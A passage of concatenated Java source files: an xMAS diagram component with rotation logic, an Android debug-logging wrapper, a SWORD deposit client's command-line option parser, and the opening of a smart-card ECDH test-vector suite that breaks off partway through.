    public static final double TOKEN_SIZE = 0.18 * SIZE;
    private static final String PROPERTY_ORIENTATION = "Orientation";

    /**
     * Component orientation in quadrant steps (0/90/180/270 degrees) with
     * rotate/flip transitions between the values.
     */
    public enum Orientation {
        ORIENTATION_0("0" + DEGREE_SYMBOL, 0),
        ORIENTATION_90("90" + DEGREE_SYMBOL, 1),
        ORIENTATION_180("180" + DEGREE_SYMBOL, 2),
        ORIENTATION_270("270" + DEGREE_SYMBOL, 3);

        private final String name;      // display string, e.g. "90°"
        private final int quadrant;     // number of 90° quadrant rotations

        Orientation(String name, int quadrant) {
            this.name = name;
            this.quadrant = quadrant;
        }

        public int getQuadrant() {
            return quadrant;
        }

        @Override
        public String toString() {
            return name;
        }

        /** @return this orientation rotated +90 degrees. */
        public Orientation rotateClockwise() {
            switch (this) {
            case ORIENTATION_0: return ORIENTATION_90;
            case ORIENTATION_90: return ORIENTATION_180;
            case ORIENTATION_180: return ORIENTATION_270;
            case ORIENTATION_270: return ORIENTATION_0;
            default: return this;
            }
        }

        /** @return this orientation rotated -90 degrees. */
        public Orientation rotateCounterclockwise() {
            switch (this) {
            case ORIENTATION_0: return ORIENTATION_270;
            case ORIENTATION_90: return ORIENTATION_0;
            case ORIENTATION_180: return ORIENTATION_90;
            case ORIENTATION_270: return ORIENTATION_180;
            default: return this;
            }
        }

        /** @return this orientation mirrored about the vertical axis (0 <-> 180). */
        public Orientation flipHorizontal() {
            switch (this) {
            case ORIENTATION_0: return ORIENTATION_180;
            case ORIENTATION_180: return ORIENTATION_0;
            default: return this;
            }
        }

        /** @return this orientation mirrored about the horizontal axis (90 <-> 270). */
        public Orientation flipVertical() {
            switch (this) {
            case ORIENTATION_90: return ORIENTATION_270;
            case ORIENTATION_270: return ORIENTATION_90;
            default: return this;
            }
        }
    };

    private Orientation orientation = Orientation.ORIENTATION_0;
    // Delegate implementing Container/ObservableHierarchy for contact children.
    protected DefaultGroupImpl groupImpl = new DefaultGroupImpl(this);

    public VisualXmasComponent(XmasComponent component) {
        super(component);
        component.addObserver(this);
        addPropertyDeclarations();
    }

    /** Registers the editable, combinable, templatable "Orientation" property. */
    private void addPropertyDeclarations() {
        addPropertyDeclaration(new PropertyDeclaration<>(Orientation.class, PROPERTY_ORIENTATION,
                this::setOrientation, this::getOrientation).setCombinable().setTemplatable());
    }

    @Override
    public XmasComponent getReferencedComponent() {
        return (XmasComponent) super.getReferencedComponent();
    }

    public Orientation getOrientation() {
        return orientation;
    }

    /**
     * Sets the orientation, physically rotating all contact positions by the
     * quadrant delta and notifying property observers.
     */
    public void setOrientation(Orientation value) {
        if (orientation != value) {
            for (VisualXmasContact contact: getContacts()) {
                AffineTransform rotateTransform = new AffineTransform();
                rotateTransform.quadrantRotate(value.getQuadrant() - getOrientation().getQuadrant());
                TransformHelper.applyTransform(contact, rotateTransform);
            }
            orientation = value;
            sendNotification(new PropertyChangedEvent(this, PROPERTY_ORIENTATION));
        }
    }

    /** @return the contact children of this component (possibly empty, never null). */
    public Collection<VisualXmasContact> getContacts() {
        ArrayList<VisualXmasContact> result = new ArrayList<>();
        for (Node n: getChildren()) {
            if (n instanceof VisualXmasContact) {
                result.add((VisualXmasContact) n);
            }
        }
        return result;
    }

    /** Adds a contact to both the math model and this visual node (if not present). */
    public void addContact(VisualXmasContact vc) {
        if (!getChildren().contains(vc)) {
            getReferencedComponent().add(vc.getReferencedComponent());
            add(vc);
        }
    }

    /** Places a contact at half-node-size offset in the given direction. */
    public void setContactPosition(VisualXmasContact vc, Positioning positioning) {
        double size2 = VisualCommonSettings.getNodeSize() / 2.0;
        vc.setPosition(new Point2D.Double(size2 * positioning.xSign, size2 * positioning.ySign));
    }

    @Override
    public Rectangle2D getInternalBoundingBoxInLocalSpace() {
        return transformShape(getShape()).getBounds2D();
    }

    /** Bounding box extended with the boxes of all contacts. */
    @Override
    public Rectangle2D getBoundingBoxInLocalSpace() {
        Rectangle2D bb = super.getBoundingBoxInLocalSpace();
        for (VisualXmasContact c: getContacts()) {
            Rectangle2D.union(bb, c.getBoundingBox(), bb);
        }
        return bb;
    }

    @Override
    public void add(Node node) {
        groupImpl.add(node);
        // Observe contact state so this component is notified of their changes.
        if (node instanceof VisualXmasContact) {
            ((VisualXmasContact) node).addObserver(this);
        }
    }

    @Override
    public Collection<Node> getChildren() {
        return groupImpl.getChildren();
    }

    @Override
    public Node getParent() {
        return groupImpl.getParent();
    }

    @Override
    public void setParent(Node parent) {
        groupImpl.setParent(parent);
    }

    // Removal of children is intentionally unsupported for xMAS components.
    @Override
    public void remove(Node node) {
    }

    @Override
    public void add(Collection<? extends Node> nodes) {
        for (Node x : nodes) {
            add(x);
        }
    }

    // Intentionally a no-op; see remove(Node).
    @Override
    public void remove(Collection<? extends Node> nodes) {
    }

    @Override
    public void reparent(Collection<? extends Node> nodes, Container newParent) {
        groupImpl.reparent(nodes, newParent);
    }

    @Override
    public void reparent(Collection<? extends Node> nodes) {
        groupImpl.reparent(nodes);
    }

    // State changes of observed contacts are currently ignored.
    @Override
    public void notify(StateEvent e) {
    }

    /** Creates, registers and positions a new input contact. */
    public VisualXmasContact createInput(Positioning positioning) {
        VisualXmasContact contact = new VisualXmasContact(new XmasContact(IOType.INPUT));
        addContact(contact);
        setContactPosition(contact, positioning);
        return contact;
    }

    /** Creates, registers and positions a new output contact. */
    public VisualXmasContact createOutput(Positioning positioning) {
        VisualXmasContact contact = new VisualXmasContact(new XmasContact(IOType.OUTPUT));
        addContact(contact);
        setContactPosition(contact, positioning);
        return contact;
    }

    @Override
    public void addObserver(HierarchyObserver obs) {
        groupImpl.addObserver(obs);
    }

    @Override
    public void removeObserver(HierarchyObserver obs) {
        groupImpl.removeObserver(obs);
    }

    @Override
    public void removeAllObservers() {
        groupImpl.removeAllObservers();
    }

    /** Subclasses supply the component's (unrotated) outline. */
    @Override
    public abstract Shape getShape();

    /** Rotates a shape by the current orientation's quadrant count. */
    public Shape transformShape(Shape shape) {
        AffineTransform rotateTransform = new AffineTransform();
        if (orientation != null) {
            rotateTransform.quadrantRotate(orientation.getQuadrant());
        }
        return rotateTransform.createTransformedShape(shape);
    }

    @Override
    public void draw(DrawRequest r) {
        Graphics2D g = r.getGraphics();
        Decoration d = r.getDecoration();
        g.setColor(ColorUtils.colorise(getForegroundColor(), d.getColorisation()));
        g.setStroke(new BasicStroke((float) XmasSettings.getBorderWidth()));
        // Draw the rotated outline, then the name and label in local coordinates.
        g.draw(transformShape(getShape()));
        drawNameInLocalSpace(r);
        drawLabelInLocalSpace(r);
    }

    @Override
    public void copyStyle(Stylable src) {
        super.copyStyle(src);
        if (src instanceof VisualXmasComponent) {
            VisualXmasComponent srcComponent = (VisualXmasComponent) src;
            setOrientation(srcComponent.getOrientation());
        }
    }

    @Override
    public void rotateClockwise() {
        setOrientation(getOrientation().rotateClockwise());
        super.rotateClockwise();
    }

    @Override
    public void rotateCounterclockwise() {
        setOrientation(getOrientation().rotateCounterclockwise());
        super.rotateCounterclockwise();
    }

    @Override
    public void flipHorizontal() {
        setOrientation(getOrientation().flipHorizontal());
        super.flipHorizontal();
    }

    @Override
    public void flipVertical() {
        setOrientation(getOrientation().flipVertical());
        super.flipVertical();
    }
}
package com.evature.evasdk.util;

import java.util.ArrayList;
import java.util.List;

/****
 * Class to show Debug Logs - similar to android.util.Log
 *
 * 1. Log text is appended with (file:line) - making the log line
 *    double-clickable in Eclipse LogCat (jumps to logging source code)
 * 2. All logs can be disabled with a single boolean flag
 * 3. Log listener can be added - making it possible to add custom
 *    logic everywhere an error log is called.
 *
 * Listeners are always notified, even when DebugMode is false; only the
 * forwarding to android.util.Log is gated by DebugMode.
 *
 * @author iftah
 */
public class DLog {

	// level constants
	public enum LogLevel {
		VERBOSE, DEBUG, INFO, WARN, ERROR, WTF
	}

	/** When false (the default) nothing is forwarded to android.util.Log. */
	static public boolean DebugMode = false;

	public interface LogListener {
		/***
		 * @param level - see level constants above
		 * @param debugMode
		 *            - true when the application has set DLog to DebugMode
		 * @param tag
		 * @param text
		 * @param callingInfo
		 *            - "(file:line)" - location of the calling code
		 */
		void logActivated(LogLevel level, boolean debugMode, String tag,
				String text, String callingInfo);

		void logActivated(LogLevel level, boolean debugMode, String tag,
				String text, String callingInfo, Throwable e);
	}

	// Guarded by the DLog.class monitor (same lock the static synchronized
	// register/unregister methods take). Never null.
	private static final ArrayList<LogListener> listeners = new ArrayList<LogListener>();

	private static String getCallingInfo() {
		// Depth 5 skips getStackTrace/getCallingInfo(int)/getCallingInfo()/the
		// public log method, landing on the original caller.
		// NOTE(review): depth is sensitive to VM stack layout - verify on target.
		return getCallingInfo(5);
	}

	/**
	 * Builds a "(File.java:line)" marker for the stack frame {@code upframes}
	 * above this call; returns "" if the frame cannot be resolved.
	 */
	private static String getCallingInfo(int upframes) {
		try {
			StackTraceElement stackTraceElement = Thread.currentThread()
					.getStackTrace()[upframes];
			String fullClassName = stackTraceElement.getClassName();
			String className = fullClassName.substring(fullClassName
					.lastIndexOf(".") + 1);
			int lineNumber = stackTraceElement.getLineNumber();
			return "(" + className + ".java:" + lineNumber + ")";
		} catch (Exception e) {
			// Defensive: a short or malformed stack trace must never break logging.
			return "";
		}
	}

	/** Adds a listener (at most once). */
	public static synchronized void registerLogListener(LogListener listener) {
		if (!listeners.contains(listener)) {
			listeners.add(listener);
		}
	}

	public static synchronized void unregisterLogListener(LogListener listener) {
		listeners.remove(listener);
	}

	/**
	 * Copies the listener list under the same lock register/unregister use.
	 * FIX: the previous code iterated {@code listeners} without any lock while
	 * register/unregister mutated it under the class lock, risking a
	 * ConcurrentModificationException. Snapshotting also keeps listener
	 * callbacks outside the lock.
	 */
	private static List<LogListener> snapshotListeners() {
		synchronized (DLog.class) {
			return new ArrayList<LogListener>(listeners);
		}
	}

	private static void notifyListeners(LogLevel level, boolean debugMode,
			String tag, String text, String callingInfo) {
		for (LogListener ll : snapshotListeners()) {
			ll.logActivated(level, debugMode, tag, text, callingInfo);
		}
	}

	private static void notifyListeners(LogLevel level, boolean debugMode,
			String tag, String text, String callingInfo, Throwable e) {
		for (LogListener ll : snapshotListeners()) {
			ll.logActivated(level, debugMode, tag, text, callingInfo, e);
		}
	}

	/**
	 * Maps an android.util.Log priority (VERBOSE..ASSERT) to our LogLevel.
	 * Unknown priorities fall back to INFO.
	 */
	private static LogLevel levelFromPriority(int priority) {
		switch (priority) {
			case android.util.Log.VERBOSE:
				return LogLevel.VERBOSE;
			case android.util.Log.DEBUG:
				return LogLevel.DEBUG;
			case android.util.Log.WARN:
				return LogLevel.WARN;
			case android.util.Log.ERROR:
				return LogLevel.ERROR;
			case android.util.Log.ASSERT:
				return LogLevel.WTF;
			case android.util.Log.INFO:
			default:
				return LogLevel.INFO;
		}
	}

	public static void d(String tag, String txt) {
		String callingInfo = getCallingInfo();
		notifyListeners(LogLevel.DEBUG, DebugMode, tag, txt, callingInfo);
		if (DebugMode) {
			android.util.Log.d(tag, txt + callingInfo);
		}
	}

	public static void d(String tag, String txt, Throwable e) {
		String callingInfo = getCallingInfo();
		notifyListeners(LogLevel.DEBUG, DebugMode, tag, txt, callingInfo, e);
		if (DebugMode) {
			android.util.Log.d(tag, txt + callingInfo, e);
		}
	}

	public static void e(String tag, String txt) {
		String callingInfo = getCallingInfo();
		notifyListeners(LogLevel.ERROR, DebugMode, tag, txt, callingInfo);
		if (DebugMode) {
			android.util.Log.e(tag, txt + callingInfo);
		}
	}

	public static void e(String tag, String txt, Throwable e) {
		String callingInfo = getCallingInfo();
		notifyListeners(LogLevel.ERROR, DebugMode, tag, txt, callingInfo, e);
		if (DebugMode) {
			android.util.Log.e(tag, txt + callingInfo, e);
		}
	}

	public static String getStackTraceString(Throwable e) {
		return android.util.Log.getStackTraceString(e);
	}

	public static void i(String tag, String txt) {
		String callingInfo = getCallingInfo();
		notifyListeners(LogLevel.INFO, DebugMode, tag, txt, callingInfo);
		if (DebugMode) {
			android.util.Log.i(tag, txt + callingInfo);
		}
	}

	public static void i(String tag, String txt, Throwable e) {
		String callingInfo = getCallingInfo();
		notifyListeners(LogLevel.INFO, DebugMode, tag, txt, callingInfo, e);
		if (DebugMode) {
			android.util.Log.i(tag, txt + callingInfo, e);
		}
	}

	public static boolean isLoggable(String tag, int lvl) {
		return DebugMode && android.util.Log.isLoggable(tag, lvl);
	}

	public static void println(int lvl, String tag, String txt) {
		String callingInfo = getCallingInfo();
		// FIX: previously listeners were always told INFO regardless of lvl;
		// now the android priority is translated to the matching LogLevel.
		notifyListeners(levelFromPriority(lvl), DebugMode, tag, txt, callingInfo);
		if (DebugMode) {
			android.util.Log.println(lvl, tag, txt + callingInfo);
		}
	}

	public static void v(String tag, String txt) {
		String callingInfo = getCallingInfo();
		notifyListeners(LogLevel.VERBOSE, DebugMode, tag, txt, callingInfo);
		if (DebugMode) {
			android.util.Log.v(tag, txt + callingInfo);
		}
	}

	public static void v(String tag, String txt, Throwable e) {
		String callingInfo = getCallingInfo();
		notifyListeners(LogLevel.VERBOSE, DebugMode, tag, txt, callingInfo, e);
		if (DebugMode) {
			android.util.Log.v(tag, txt + callingInfo, e);
		}
	}

	public static void w(String tag, String txt) {
		String callingInfo = getCallingInfo();
		notifyListeners(LogLevel.WARN, DebugMode, tag, txt, callingInfo);
		if (DebugMode) {
			android.util.Log.w(tag, txt + callingInfo);
		}
	}

	public static void w(String tag, String txt, Throwable e) {
		String callingInfo = getCallingInfo();
		notifyListeners(LogLevel.WARN, DebugMode, tag, txt, callingInfo, e);
		if (DebugMode) {
			android.util.Log.w(tag, txt + callingInfo, e);
		}
	}

	public static void w(String tag, Throwable e) {
		String callingInfo = getCallingInfo();
		notifyListeners(LogLevel.WARN, DebugMode, tag, "", callingInfo, e);
		if (DebugMode) {
			android.util.Log.w(tag, e);
		}
	}

	public static void wtf(String tag, String txt) {
		String callingInfo = getCallingInfo();
		notifyListeners(LogLevel.WTF, DebugMode, tag, txt, callingInfo);
		if (DebugMode) {
			android.util.Log.wtf(tag, txt + callingInfo);
		}
	}

	public static void wtf(String tag, String txt, Throwable e) {
		String callingInfo = getCallingInfo();
		notifyListeners(LogLevel.WTF, DebugMode, tag, txt, callingInfo, e);
		if (DebugMode) {
			android.util.Log.wtf(tag, txt + callingInfo, e);
		}
	}

	public static void wtf(String tag, Throwable e) {
		String callingInfo = getCallingInfo();
		notifyListeners(LogLevel.WTF, DebugMode, tag, "", callingInfo, e);
		if (DebugMode) {
			android.util.Log.wtf(tag, e);
		}
	}
}
/** * The contents of this file are subject to the license and copyright * detailed in the LICENSE and NOTICE files at the root of the source * tree and available online at * * http://www.dspace.org/license/ */ package org.purl.sword.client; import java.util.ArrayList; import java.util.Iterator; import java.util.List; import java.util.regex.Matcher; import java.util.regex.Pattern; import org.apache.log4j.Logger; /** * List of options that are parsed from the command line. * @author Neil Taylor */ public class ClientOptions { /** * Label for the service operation. */ public static final String TYPE_SERVICE = "service"; /** * Label for the post operation. */ public static final String TYPE_POST = "post"; /** * Label for the multipost operation. */ public static final String TYPE_MULTI_POST = "multipost"; /** * The access type. */ private String accessType = null; /** * Proxy host name. */ private String proxyHost = null; /** * Proxy host port. */ private int proxyPort = 8080; /** * Username to access the service/post server. */ private String username = null; /** * Password to access the service/post server. */ private String password = null; /** * HREF of the server to access. */ private String href = null; /** * Filename to post. */ private String filename = null; /** * Filetype. */ private String filetype = null; /** * Specifies that the output streams are not to be captured by the GUI client. */ private boolean noCapture = false; /** * SLUG Header field. */ private String slug = null; /** * NoOp, used to indicate an operation on the server that does not * require the file to be stored. */ private boolean noOp = false; /** * Request verbose output from the server. */ private boolean verbose = false; /** * OnBehalfOf user id. */ private String onBehalfOf = null; /** * Format namespace to be used for the posted file. */ private String formatNamespace = null; /** * Introduce a checksum error. This is used to simualte an error with the * MD5 value. 
*/ private boolean checksumError = false; /** * Logger. */ private static Logger log = Logger.getLogger(ClientOptions.class); /** * List of multiple destination items. Used if the mode is set to multipost. */ private List<PostDestination> multiPost = new ArrayList<PostDestination>(); /** * Pattern string to extract the data from a destination parameter in multipost mode. */ private static final Pattern multiPattern = Pattern.compile("(.*?)(\\[(.*?)\\]){0,1}(:(.*)){0,1}@(http://.*)"); /** * Flag that indicates if the gui mode has been set. This is * true by default. */ private boolean guiMode = true; /** * Flat that indicates if the MD5 option has been selected. This * is true by default. */ private boolean md5 = false; /** * Parse the list of options contained in the specified array. * * @param args The array of options. * * @return True if the options were parsed successfully. */ public boolean parseOptions( String[] args ) { try { // iterate over the args for( int i = 0; i < args.length; i++ ) { if( "-md5".equals(args[i])) { md5 = true; } if( "-noOp".equals(args[i])) { noOp = true; } if( "-verbose".equals(args[i])) { verbose = true; } if( "-cmd".equals(args[i]) ) { guiMode = false; } if( "-gui".equals(args[i]) ) { guiMode = true; } if( "-host".equals(args[i]) ) { i++; proxyHost = args[i]; } if( "-port".equals(args[i]) ) { i++; proxyPort = Integer.parseInt(args[i]); } if( "-u".equals(args[i]) ) { i++; username = args[i]; } if( "-p".equals(args[i])) { i++; password = args[i]; } if( "-href".equals(args[i])) { i++; href = args[i]; } if( "-help".equals(args[i]) ) { // force the calling code to display the usage information return false; } if( "-t".equals(args[i])) { i++; accessType = args[i]; } if( "-file".equals(args[i])) { i++; filename = args[i]; } if( "-filetype".equals(args[i])) { i++; filetype = args[i]; } if( "-slug".equals(args[i])) { i++; slug = args[i]; } if( "-onBehalfOf".equals(args[i])) { i++; onBehalfOf = args[i]; } if( 
"-formatNamespace".equals(args[i])) { i++; formatNamespace = args[i]; } if( "-checksumError".equals(args[i])) { i++; checksumError = true; } if( "-dest".equals(args[i])) { i++; Matcher m = multiPattern.matcher(args[i]); if( ! m.matches() ) { log.debug("Error with dest parameter. Ignoring value: " + args[i]); } else { int numGroups = m.groupCount(); for( int g = 0; g <= numGroups; g++ ) { log.debug("Group (" + g + ") is: " + m.group(g)); } String username = m.group(1); String onBehalfOf = m.group(3); String password = m.group(5); String url = m.group(6); PostDestination destination = new PostDestination(url, username, password, onBehalfOf); multiPost.add(destination); } } if( "-nocapture".equals(args[i]) ) { i++; noCapture = true; } } // apply any settings if( href == null && "service".equals(accessType) ) { log.error( "No href specified."); return false; } if( multiPost.size() == 0 && "multipost".equals(accessType)) { log.error("No destinations specified"); return false; } if( accessType == null && ! guiMode ) { log.error("No access type specified"); return false; } if( ( username == null && password != null ) || (username != null && password == null)) { log.error("The username and/or password are not specified. If one is specified, the other must also be specified."); return false; } } catch( ArrayIndexOutOfBoundsException ex ) { log.error("Error with parameters."); return false; } return true; } /** * Get the access type. * @return The value, or <code>null</code> if the value is not set. */ public String getAccessType() { return accessType; } /** * Set the access type. * @param accessType The value, or <code>null</code> to clear the value. */ public void setAccessType(String accessType) { this.accessType = accessType; } /** * Get the proxy host. * @return The value, or <code>null</code> if the value is not set. */ public String getProxyHost() { return proxyHost; } /** * Set the proxy host. * @param proxyHost The value, or <code>null</code> to clear the value. 
*/ public void setProxyHost(String proxyHost) { this.proxyHost = proxyHost; } /** * Get the proxy port. * @return The proxy port. Default value is 80. */ public int getProxyPort() { return proxyPort; } /** * Set the proxy port. * @param proxyPort The proxy port. */ public void setProxyPort(int proxyPort) { this.proxyPort = proxyPort; } /** * Get the username. * @return The value, or <code>null</code> if the value is not set. */ public String getUsername() { return username; } /** * Set the username. * @param username The value, or <code>null</code> to clear the value. */ public void setUsername(String username) { this.username = username; } /** * Get the password. * @return The value, or <code>null</code> if the value is not set. */ public String getPassword() { return password; } /** * Set the password. * @param password The value, or <code>null</code> to clear the value. */ public void setPassword(String password) { this.password = password; } /** * Get the HREF of the service to access. * @return The value, or <code>null</code> if the value is not set. */ public String getHref() { return href; } /** * Set the HREF of the service to access. * @param href The value, or <code>null</code> to clear the value. */ public void setHref(String href) { this.href = href; } /** * Get the name of the file to post. * @return The value, or <code>null</code> if the value is not set. */ public String getFilename() { return filename; } /** * Set the name of the file to post. * @param filename The value, or <code>null</code> to clear the value. */ public void setFilename(String filename) { this.filename = filename; } /** * Get the type of the file to post. * @return The filetype, or <code>null</code> if the value is not set. */ public String getFiletype() { return filetype; } /** * Set the type of the file to post. * @param filetype The value, or <code>null</code> to clear the value. 
*/ public void setFiletype(String filetype) { this.filetype = filetype; } /** * Determine if the tool is to be run in GUI mode. * @return True if the tool is set for GUI mode. */ public boolean isGuiMode() { return guiMode; } /** * Set the tool to run in GUI mode. * @param guiMode True if the tool is to run in gui mode. */ public void setGuiMode(boolean guiMode) { this.guiMode = guiMode; } /** * Get the MD5 setting. True if the tool is to use MD5 for post operations. * @return The MD5 setting. */ public boolean isMd5() { return md5; } /** * Set the MD5 setting. * @param md5 True if the tool should use MD5 for post operations. */ public void setMd5(boolean md5) { this.md5 = md5; } /** * Determine if the NoOp header should be sent. * @return True if the header should be sent. */ public boolean isNoOp() { return noOp; } /** * Set the NoOp setting. * @param noOp True if the NoOp header should be used. */ public void setNoOp(boolean noOp) { this.noOp = noOp; } /** * Determine if the verbose option is set. * @return True if verbose option is set. */ public boolean isVerbose() { return verbose; } /** * Set the verbose option. * @param verbose True if verbose should be set. */ public void setVerbose(boolean verbose) { this.verbose = verbose; } /** * Get the onBehalfOf value. * @return The value, or <code>null</code> to clear the value. */ public String getOnBehalfOf() { return onBehalfOf; } /** * Set the onBehalf of Value. * @param onBehalfOf The value, or <code>null</code> to clear the value. */ public void setOnBehalfOf(String onBehalfOf) { this.onBehalfOf = onBehalfOf; } /** * Get the format namespace value. * @return The value, or <code>null</code> if the value is not set. */ public String getFormatNamespace() { return formatNamespace; } /** * Set the format namespace value. * @param formatNamespace The value, or <code>null</code> to clear the value. 
*/ public void setFormatNamespace(String formatNamespace) { this.formatNamespace = formatNamespace; } /** * Get the checksum error value. * @return True if an error should be introduced into the checksum. */ public boolean getChecksumError() { return checksumError; } /** * Set the checksum error value. * @param checksumError True if the error should be introduced. */ public void setChecksumError(boolean checksumError) { this.checksumError = checksumError; } /** * Get the current slug header. * @return The slug value, or <code>null</code> if the value is not set. */ public String getSlug( ) { return this.slug; } /** * Set the text that is to be used for the slug header. * @param slug The value, or <code>null</code> to clear the value. */ public void setSlug(String slug) { this.slug = slug; } /** * Get the list of post destinations. * @return An iterator over the list of PostDestination objects. */ public Iterator<PostDestination> getMultiPost() { return multiPost.iterator(); } /** * Determine if the noCapture option is set. This indicates that the code * should not attempt to redirect stdout and stderr to a different output * destination. Intended for use in a GUI client. * * @return The noCapture setting. True if set. */ public boolean isNoCapture() { return noCapture; } }
package cz.crcs.ectester.reader.test;

import cz.crcs.ectester.applet.ECTesterApplet;
import cz.crcs.ectester.applet.EC_Consts;
import cz.crcs.ectester.common.ec.*;
import cz.crcs.ectester.common.output.TestWriter;
import cz.crcs.ectester.common.test.CompoundTest;
import cz.crcs.ectester.common.test.Result;
import cz.crcs.ectester.common.test.Test;
import cz.crcs.ectester.common.test.TestCallback;
import cz.crcs.ectester.common.util.ByteUtil;
import cz.crcs.ectester.common.util.CardUtil;
import cz.crcs.ectester.common.util.ECUtil;
import cz.crcs.ectester.data.EC_Store;
import cz.crcs.ectester.reader.CardMngr;
import cz.crcs.ectester.reader.ECTesterReader;
import cz.crcs.ectester.reader.command.Command;
import cz.crcs.ectester.reader.response.Response;
import javacard.security.KeyPair;

import javax.crypto.KeyAgreement;
import java.io.IOException;
import java.math.BigInteger;
import java.security.*;
import java.security.spec.ECParameterSpec;
import java.security.spec.ECPrivateKeySpec;
import java.security.spec.ECPublicKeySpec;
import java.security.spec.InvalidKeySpecException;
import java.util.ArrayList;
import java.util.LinkedList;
import java.util.List;
import java.util.Map;
import java.util.function.BiFunction;
import java.util.stream.Collectors;

import static cz.crcs.ectester.common.test.Result.ExpectedValue;
import static cz.crcs.ectester.common.test.Result.Value;

/**
 * Suite validating on-card ECDH/ECDSA correctness: first against stored
 * known-answer test vectors, then (when the BC provider is available) by
 * replaying card-generated keys through a host-side implementation.
 *
 * @author Jan Jancar johny@neuromancer.sk
 */
public class CardTestVectorSuite extends CardTestSuite {

    public CardTestVectorSuite(TestWriter writer, ECTesterReader.Config cfg, CardMngr cardManager) {
        super(writer, cfg, cardManager, "test-vectors", null, "The test-vectors suite contains a collection of test vectors which test basic ECDH correctness.");
    }

    @Override
    protected void runTests() throws Exception {
        /* Set original curves (secg/nist/brainpool). Set keypairs from test vectors.
         * Do ECDH both ways, export and verify that the result is correct.
         */
        Map<String, EC_KAResult> results = EC_Store.getInstance().getObjects(EC_KAResult.class, "test");
        for (EC_KAResult result : results.values()) {
            EC_Curve curve = EC_Store.getInstance().getObject(EC_Curve.class, result.getCurve());
            // The "one" key may be stored either as a full keypair or as a bare private key.
            EC_Params onekey = EC_Store.getInstance().getObject(EC_Keypair.class, result.getOneKey());
            if (onekey == null) {
                onekey = EC_Store.getInstance().getObject(EC_Key.Private.class, result.getOneKey());
            }
            // The "other" key may be a full keypair or a bare public key.
            EC_Params otherkey = EC_Store.getInstance().getObject(EC_Keypair.class, result.getOtherKey());
            if (otherkey == null) {
                otherkey = EC_Store.getInstance().getObject(EC_Key.Public.class, result.getOtherKey());
            }
            if (onekey == null || otherkey == null) {
                throw new IOException("Test vector keys couldn't be located.");
            }
            List<Test> testVector = new LinkedList<>();
            // Probe support first: if the card cannot allocate this curve's keypair,
            // report "no support" and move on to the next vector.
            Test allocate = runTest(CommandTest.expect(new Command.Allocate(this.card, ECTesterApplet.KEYPAIR_BOTH, curve.getBits(), curve.getField()), ExpectedValue.SUCCESS));
            if (!allocate.ok()) {
                doTest(CompoundTest.all(ExpectedValue.SUCCESS, "No support for " + curve.getBits() + "b " + CardUtil.getKeyTypeString(curve.getField()) + ".", allocate));
                continue;
            }
            testVector.add(allocate);
            // Load the external curve domain parameters and both vector keys onto the card.
            testVector.add(CommandTest.expect(new Command.Set(this.card, ECTesterApplet.KEYPAIR_BOTH, EC_Consts.CURVE_external, curve.getParams(), curve.flatten()), ExpectedValue.SUCCESS));
            testVector.add(CommandTest.expect(new Command.Set(this.card, ECTesterApplet.KEYPAIR_LOCAL, EC_Consts.CURVE_external, EC_Consts.PARAMETER_S, onekey.flatten(EC_Consts.PARAMETER_S)), ExpectedValue.SUCCESS));
            testVector.add(CommandTest.expect(new Command.Set(this.card, ECTesterApplet.KEYPAIR_REMOTE, EC_Consts.CURVE_external, EC_Consts.PARAMETER_W, otherkey.flatten(EC_Consts.PARAMETER_W)), ExpectedValue.SUCCESS));
            // Run ECDH on-card, export the secret, and compare it with the known answer.
            testVector.add(CommandTest.function(new Command.ECDH(this.card, ECTesterApplet.KEYPAIR_REMOTE, ECTesterApplet.KEYPAIR_LOCAL, ECTesterApplet.EXPORT_TRUE, EC_Consts.TRANSFORMATION_NONE, result.getJavaCardKA()), new TestCallback<CommandTestable>() {
                @Override
                public Result apply(CommandTestable testable) {
                    Response.ECDH dh = (Response.ECDH) testable.getResponse();
                    if (!dh.successful())
                        return new Result(Value.FAILURE, "ECDH was unsuccessful.");
                    if (!dh.hasSecret())
                        return new Result(Value.FAILURE, "ECDH response did not contain the derived secret.");
                    if (!ByteUtil.compareBytes(dh.getSecret(), 0, result.getData(0), 0, dh.secretLength())) {
                        int firstDiff = ByteUtil.diffBytes(dh.getSecret(), 0, result.getData(0), 0, dh.secretLength());
                        return new Result(Value.FAILURE, "ECDH derived secret does not match the test-vector, first difference was at byte " + firstDiff + ".");
                    }
                    return new Result(Value.SUCCESS);
                }
            }));
            if (cfg.cleanup) {
                testVector.add(CommandTest.expect(new Command.Cleanup(this.card), ExpectedValue.ANY));
            }
            doTest(CompoundTest.greedyAll(ExpectedValue.SUCCESS, "Test vector " + result.getId() + ".", testVector.toArray(new Test[0])));
        }

        // Second phase: generate keys on-card and cross-check ECDH/ECDSA results
        // against a host-side BouncyCastle implementation.
        KeyAgreement ka;
        Signature sig;
        KeyFactory kf;
        MessageDigest md;
        try {
            ka = KeyAgreement.getInstance("ECDH", "BC");
            sig = Signature.getInstance("ECDSAwithSHA1", "BC");
            kf = KeyFactory.getInstance("ECDH", "BC");
            md = MessageDigest.getInstance("SHA1", "BC");
        } catch (NoSuchAlgorithmException | NoSuchProviderException ex) {
            // Without the BC provider the validation phase cannot run; skip it.
            return;
        }
        // Only prime-field (FP) curves are validated in this phase.
        List<EC_Curve> testCurves = new ArrayList<>();
        testCurves.addAll(EC_Store.getInstance().getObjects(EC_Curve.class, "secg").values().stream().filter((curve) -> curve.getField() == KeyPair.ALG_EC_FP).collect(Collectors.toList()));
        testCurves.addAll(EC_Store.getInstance().getObjects(EC_Curve.class, "brainpool").values().stream().filter((curve) -> curve.getField() == KeyPair.ALG_EC_FP).collect(Collectors.toList()));
        for (EC_Curve curve : testCurves) {
            List<Test> testVector = new LinkedList<>();
            Test allocate = runTest(CommandTest.expect(new Command.Allocate(this.card, ECTesterApplet.KEYPAIR_BOTH, curve.getBits(), curve.getField()), ExpectedValue.SUCCESS));
            if (!allocate.ok()) {
                doTest(CompoundTest.all(ExpectedValue.SUCCESS, "No support for " + curve.getBits() + "b " + CardUtil.getKeyTypeString(curve.getField()) + ".", allocate));
                continue;
            }
            testVector.add(allocate);
            testVector.add(CommandTest.expect(new Command.Set(this.card, ECTesterApplet.KEYPAIR_BOTH, EC_Consts.CURVE_external, curve.getParams(), curve.flatten()), ExpectedValue.SUCCESS));
            testVector.add(CommandTest.expect(new Command.Generate(this.card, ECTesterApplet.KEYPAIR_BOTH), ExpectedValue.SUCCESS));
            // Export the generated local public key and remote private key so the
            // host-side computation can replay the same operation.
            CommandTest exportLocal = CommandTest.expect(new Command.Export(this.card, ECTesterApplet.KEYPAIR_LOCAL, EC_Consts.KEY_PUBLIC, EC_Consts.PARAMETER_W), ExpectedValue.ANY);
